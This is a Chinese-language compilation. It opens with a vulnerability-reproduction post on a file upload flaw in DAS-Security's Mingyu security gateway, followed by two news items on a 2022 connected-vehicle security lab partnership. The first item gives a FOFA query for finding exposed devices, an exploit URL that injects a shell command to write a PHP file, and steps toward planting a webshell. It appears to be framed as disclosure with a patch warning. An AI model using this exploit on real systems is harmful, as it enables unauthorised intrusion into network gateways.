1. 安恆信息明御安全網關存在任意文件上傳漏洞 附POC
安恆信息明御安全網關存在任意文件上傳漏洞,用戶可利用此漏洞上傳webshell。該漏洞影響所有版本的明御安全網關,用戶可使用以下fofa查詢語句進行檢測:title="明御安全網關"。漏洞復現實例如下:
利用漏洞鏈接:https://127.0.0.1/webui/?g=aaa_portal_auth_local_submit&bkg_flag=0&$type=1&suffix=1%7Cecho+%2241506657%22+%3E+.87919.php上傳文件。若返回包出現 "success",證明文件已成功上傳。通過拼接上傳的文件路徑:https://127.0.0.1/webui/.87919.php,可查看上傳內容,若替換內容為一句話木馬,即可實現getshell。
為確保網路安全,強烈建議受影響的用戶盡快採取修復措施。同時,為方便學習與研究,關注公眾號"南風漏洞復現文庫"並回復"漏洞復現58"即可獲取相關POC工具下載地址。在使用時,請嚴格遵守法律法規,僅用於學習與研究目的,切勿用於非法測試或活動。
2. 吉利研究院、騰訊雲、中汽數據、安恆信息簽署戰略合作
2022年1月11日,騰訊雲、吉利汽車研究院、中汽數據和安恆信息聯合簽署車聯網網路安全實驗室戰略合作框架,並舉行了實驗室揭牌儀式。四方將正式在車聯網網路安全領域展開全方位合作,共建行業領先的智能網聯汽車安全運營體系。
吉利汽車研究院院長康國旺、副院長任向飛,騰訊智慧出行副總裁鍾學丹、騰訊安全策略發展中心總經理呂一平,中汽數據有限公司總經理馮屹,安恆信息董事長范淵等共同出席了本次簽約和揭牌儀式。
根據國務院印發的《新能源汽車產業發展規劃(2021-2035 年)》文件顯示,到2025年,我國智能汽車銷量將達到當年汽車總銷量20%,其中有條件自動駕駛智能網聯汽車銷量佔比30%;而到2030年,這兩個數字將分別達到40%和70%。
伴隨車聯網智能化進程的不斷推進,車聯網網路安全需要解決諸多問題,例如確保數字基礎設施完整性、建立風險緩解及應對策略、抵禦惡意攻擊訪問等。而由於汽車安全關繫到人身安全,網路安全在其中的重要性更加不言而喻,國家發改委發布的《智能汽車創新發展戰略》,也明確把「建立全面高效的智能汽車網路安全體系」作為六大戰略目標之一。此次四方成立網路安全實驗室,是立足國家戰略、著眼產業發展的有力舉措。
吉利汽車研究院院長康國旺表示:「車聯網安全是吉利未來關鍵基石之一,吉利願意和業界一流安全企業打造新型戰略合作夥伴關系,通過建設業內頂尖的車聯網實驗室僅僅是多方合作的第一步,引入合作夥伴安全基因和能力,共創共贏車聯網安全新業態,更是吉利車聯網安全的下一步發展戰略。」
「應對智能網聯汽車的安全挑戰,離不開產業各界的開放合作,協同研究。」騰訊智慧出行副總裁鍾學丹表示,四方聯合成立安全實驗室,是汽車網路安全領域里頗具意義的跨界聯手,騰訊將貢獻多年來在汽車安全領域的前沿研究成果,與吉利研究院、中汽數據、安恆一同開放共創,將網路安全建設融入整車研發製造全流程,共建行業領先的智能網聯汽車安全運營體系,護航汽車產業安全建設。
騰訊安全在車聯網安全方面積累了國際領先安全研究成果,以科恩實驗室為代表的騰訊安全團隊已在智能網聯汽車網路安全領域輸出多個如特斯拉、寶馬、豐田等網聯汽車的國際級研究成果,並為20餘家整車企業提供網聯汽車安全解決方案和專家服務。
此次簽約也標志著騰訊與吉利汽車集團的合作再進一步。2021年1月,騰訊與吉利汽車集團簽署戰略合作協議,圍繞智能座艙、自動駕駛、數字化營銷、數字化底座、數字化新業務及低碳發展等領域展開全方位戰略合作。2021年8月,騰訊與吉利工業互聯網平台總部廣域銘島在重慶簽署戰略合作協議,雙方將攜手在工業互聯網行業生態、工業智能協同創新等領域展開深入合作。
此次四方戰略合作,將進一步打造智能網聯汽車安全產品,將網路安全建設融入整車研發製造流程,提升智能網聯汽車雲管端一體化的網路安全水平,提供可以覆蓋全場景的智聯網聯汽車網路安全能力,積極樹立差異化的網路安全技術優勢。
3. 安恆信息與吉利研究院、騰訊雲、中汽數據達成四方戰略合作
1月11日,吉利汽車研究院、中汽數據、騰訊雲、安恆信息舉行簽約儀式,宣布簽署車聯網網路安全實驗室戰略合作框架,並舉行實驗室揭牌儀式,四方正式在車聯網網路安全領域展開全方位合作。這標志著安恆信息將在車聯網生態領域提供更全面的安全能力。
當前,安恆信息已經和國內多個汽車企業、政府單位達成深度戰略合作。安恆信息車聯網安全解決方案,以「雲、管、端,芯」一體化縱深安全防護體系建設為核心目標,涵蓋實驗室建設、安全檢測防護、專業人才培養等多方位的安全建設需求,致力於車聯網信息安全能力全方位應用,以進一步保障智慧交通的信息安全建設。
未來,安恆信息將全面深化運用數據安全分級分類、訪問控制、國密演算法、入侵檢測等先進技術,完善涵蓋智能網聯汽車、移動智能終端、智慧交通服務平台以及多種類型網路通信的多級多域的防護體系,藉助大數據分析、邊緣計算、人工智慧技術逐步實現智能網聯汽車的可信安全體系建設,推動智能網聯汽車的網路安全產業的快速發展。